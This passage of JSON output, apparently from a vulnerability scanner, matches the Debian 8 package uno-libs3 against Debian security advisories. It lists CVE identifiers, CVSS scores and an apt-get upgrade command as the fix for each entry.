"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u12_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DLA-1669-1:E907A",
"cvelist": [
"CVE-2018-16858"
],
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DLA-1947-1:BAC22": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u13",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u13_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DLA-1947-1:BAC22",
"cvelist": [
"CVE-2019-9852",
"CVE-2019-9854",
"CVE-2019-9849",
"CVE-2019-9853",
"CVE-2019-9850",
"CVE-2019-9848",
"CVE-2018-16858",
"CVE-2019-9851"
],
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
]
}
},
"vulnerabilities": [
"DEBIAN:DSA-3837-1:BCC65",
"DEBIAN:DLA-1669-1:E907A",
"DEBIAN:BSA-096:958E6",
"DEBIAN:DSA-3482-1:91A41",
"DEBIAN:DSA-4111-2:43AFA",
"DEBIAN:DSA-4178-1:A9FA0",
"DEBIAN:DSA-4022-1:5372C",
"DEBIAN:DSA-3608-1:00C2E",
"DEBIAN:DSA-3792-1:CB086",
"DEBIAN:DSA-3394-1:77FE6",
"DEBIAN:DSA-3236-1:341CA",
"DEBIAN:DLA-1947-1:BAC22"
],
"reasons": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u5",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u5_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3608-1:00C2E",
"cvelist": [
"CVE-2016-4324"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
},
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u10",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u10_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-4111-2:43AFA",
"cvelist": [
"CVE-2018-6871"
],
"cvss": {
"score": 5.0,
"vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
},
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u2",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u2_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3394-1:77FE6",
"cvelist": [
"CVE-2015-5214",
"CVE-2015-5212",
"CVE-2015-4551",
"CVE-2015-5213"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
},
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u7",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u7_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3837-1:BCC65",
"cvelist": [
"CVE-2017-7870"
],
"cvss": {
"score": 7.5,
"vector": "AV:N/